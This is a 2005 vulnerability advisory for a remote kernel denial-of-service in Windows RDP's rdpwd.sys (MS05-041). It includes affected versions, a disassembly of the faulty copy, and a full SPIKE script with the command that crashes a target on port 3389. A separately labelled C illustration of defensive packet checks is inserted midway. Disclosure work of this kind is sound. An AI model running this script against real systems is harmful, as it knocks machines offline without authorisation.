    Microsoft Windows RDP 'rdpwd.sys' Remote Kernel DoS

    As I previously reported, there is a remote kernel denial of service vulnerability in the Remote Desktop Services protocol which affects every version of Microsoft Windows. Please read more for the full details.

    Microsoft Windows RDP 'rdpwd.sys' Remote Kernel DoS

    Release Date:
    August 9, 2005

    Date Reported:
    May 4, 2005

    Severity:
    Medium

    Vendor:
    Microsoft

    Systems Affected:
    Microsoft Windows 2000 Service Pack 4
    Microsoft Windows XP Service Pack 1
    Microsoft Windows XP Service Pack 2
    Microsoft Windows XP Professional x64 Edition
    Microsoft Windows Server 2003
    Microsoft Windows Server 2003 for Itanium-based Systems
    Microsoft Windows Server 2003 Service Pack 1
    Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
    Microsoft Windows Server 2003 x64 Edition

    Overview:
    A denial of service vulnerability exists within Remote Desktop Services which allows an attacker to send a specially crafted RDP packet in order to crash the remote vulnerable system.

    This flaw specifically exists within the rdpwd.sys driver, which is used by Remote Desktop Services.

    Technical Details:
    It appears that the problem exists because RDP does not release the memory it is using. The kernel can only use a certain amount of physical memory, so when RDP exceeds its memory limit the system crashes.

    After analyzing the dump file, you can see that RDP tries to copy 7 bytes starting at the error point. If the packet it is looking at does not have 7 bytes following that error point, the problem occurs: whatever data follows is copied into memory regardless, as shown below.

    This is taken from Windows XP SP2 rdpwd.sys version 5.1.2600.2180.

    .text:00010579 mov ecx, [ebx+28h]
    .text:0001057C cmp edi, ecx
    .text:0001057E jbe loc_1049E ;<-- find the error, then go to error process

    .text:0001049E push 7 ;<-- push fix y
    .text:000104A0 push esi ;<-- the find error point
    .text:000104A1 push 0Bh
    .text:000104A3 jmp loc_107C8

    .text:000107C8 push dword ptr [ebx+2Ch]
    .text:000107CB push dword ptr [ebx]
    .text:000107CD call _MCSProtocolErrorEvent@20 ;<-- call error process

    .text:0002BC60 mov eax, [ebp+arg_14] ;<-- the size is 7
    .text:0002BC63
    .text:0002BC63 loc_2BC63: ; CODE XREF: MCSProtocolErrorEvent+9E↑j
    .text:0002BC63 test esi, esi
    .text:0002BC65 jz short loc_2BC7F
    .text:0002BC67 push edi
    .text:0002BC68 mov ecx, eax
    .text:0002BC6A mov edx, ecx
    .text:0002BC6C shr ecx, 2
    .text:0002BC6F lea edi, [ebp+var_100]
    .text:0002BC75 rep movsd


    Below is the remoteass.spk SPIKE script which reproduces this issue on Windows XP SP2:

    // Windows XP SP2 'rdpwd.sys' Remote Kernel DoS
    //
    // Discovered by:
    // Tom Ferris
    // tommy[at]security-protocols[dot]com
    //
    // Tested on:
    // Microsoft Windows XP SP2
    //
    // Usage: ./generic_send_tcp 192.168.1.100 3389 remoteass.spk 1 0
    //
    // 8/9/2005 Security-Protocols.com
    //
    // This program is free software; you can redistribute it and/or modify it under
    // the terms of the GNU General Public License version 2, 1991 as published by
    // the Free Software Foundation.

    s_block_start("packet_1");
    s_string_variable("03");
    // Well-formed TPKT (len 0x27) + X.224 Connection Request carrying the routing token "Cookie: mstshash=Administr\r\n"
    s_binary("03 00 00 27 22 E0 00 00 00 00 00 43 6F 6F 6B 69 65 3A 20 6D 73 74 73 68 61 73 68 3D 41 64 6D 69 6E 69 73 74 72 0D 0A");
    // Second TPKT declares the same 0x27 length but is cut off right after "Cookie:"; fuzz strings and 'A's follow instead
    s_binary("03 00 00 27 22 E0 00 00 00 00 00 43 6F 6F 6B 69 65 3A");
    s_string_variable("");
    s_binary("41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41");
    s_string_variable("");
    s_block_end("packet_1");

    s_block_start("packet_2");
    s_int_variable(0x0500,5);
    s_block_end("packet_2");

    s_block_start("packet_3");
    s_binary("000002020000");
    s_string_variable("");
    s_block_end("packet_3");

    This is how the script should be run:

    ./generic_send_tcp 192.168.1.102 3389 remoteass.spk 1 0
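    The two checks the advisory's analysis points at, written up here in C as an added illustration (this is not code from the advisory, from rdpwd.sys or from Microsoft): a TPKT/X.224 framing check that rejects a Connection Request whose declared length does not match the bytes received, such as the truncated second TPKT in the script, and an error-context copy that clamps to the bytes remaining instead of copying a fixed 7. The byte arrays are constructed from the script's hex; the function names, offsets and return codes are my own.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define ERR_CONTEXT_BYTES 7   /* the fixed "push 7" copy size seen in the disassembly */

/* Hardened context copy for the error path: clamps to the bytes that actually
 * remain in the packet instead of blindly copying 7. Returns bytes copied. */
size_t copy_error_context(const uint8_t *pkt, size_t pkt_len, size_t err_off,
                          uint8_t out[ERR_CONTEXT_BYTES]) {
    memset(out, 0, ERR_CONTEXT_BYTES);
    if (err_off >= pkt_len) return 0;
    size_t n = pkt_len - err_off;
    if (n > ERR_CONTEXT_BYTES) n = ERR_CONTEXT_BYTES;
    memcpy(out, pkt + err_off, n);
    return n;
}

/* Validate TPKT framing of an X.224 Connection Request and its optional
 * "Cookie:" routing token. Returns 0 when consistent, a negative code otherwise. */
int validate_rdp_cr(const uint8_t *pkt, size_t pkt_len) {
    if (pkt_len < 11 || pkt[0] != 0x03) return -1;   /* TPKT v3: 4-byte header + 7-byte CR */
    size_t tpkt_len = ((size_t)pkt[2] << 8) | pkt[3];
    if (tpkt_len != pkt_len) return -2;               /* declared length must match bytes received */
    if (pkt[5] != 0xE0 || (size_t)pkt[4] + 5 != pkt_len) return -3; /* CR TPDU, LI covers the rest */
    const uint8_t *body = pkt + 11;
    size_t body_len = pkt_len - 11;
    if (body_len >= 7 && memcmp(body, "Cookie:", 7) == 0) { /* token must end in CR LF inside the PDU */
        for (size_t i = 7; i + 1 < body_len; i++)
            if (body[i] == '\r' && body[i + 1] == '\n') return 0;
        return -4;
    }
    return 0;
}

/* Constructed samples built from the hex in the SPIKE script above (not captured traffic). */
static const uint8_t GOOD_CR[] = { 0x03,0x00,0x00,0x27, 0x22,0xE0,0,0,0,0,0,
    'C','o','o','k','i','e',':',' ','m','s','t','s','h','a','s','h','=',
    'A','d','m','i','n','i','s','t','r','\r','\n' };
static const uint8_t TRUNC_CR[] = { 0x03,0x00,0x00,0x27, 0x22,0xE0,0,0,0,0,0,
    'C','o','o','k','i','e',':' };

int check_good(void)  { return validate_rdp_cr(GOOD_CR, sizeof GOOD_CR); }   /* 0 */
int check_trunc(void) { return validate_rdp_cr(TRUNC_CR, sizeof TRUNC_CR); } /* -2: declares 39, only 18 arrived */
size_t check_tail(void) { uint8_t c[ERR_CONTEXT_BYTES];                      /* only 3 bytes left at offset 15 */
    return copy_error_context(TRUNC_CR, sizeof TRUNC_CR, 15, c); }

int main(void) {
    printf("good=%d truncated=%d tail_copy=%zu\n", check_good(), check_trunc(), check_tail());
    return 0;
}
```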

    Vendor Status:
    Microsoft has released a patch for this issue:

    MS05-041

    Discovered by:
    Tom Ferris

    Related Links:
    www.security-protocols.com/released/xp-sp2-rdp-dos.rar
    www.microsoft.com/technet/security/advisory/904797.mspx
    www.microsoft.com/technet/security/Bulletin/MS05-041.mspx

    Greetings:
    c0nnie, chicofleeco, ac1djazz, costa rica mike, modify, the angrypacket krew and michael.

    Copyright (c) 2005 Security-Protocols.com

    Posted on Tuesday, August 09 @ 10:43:08 PDT by badpack3t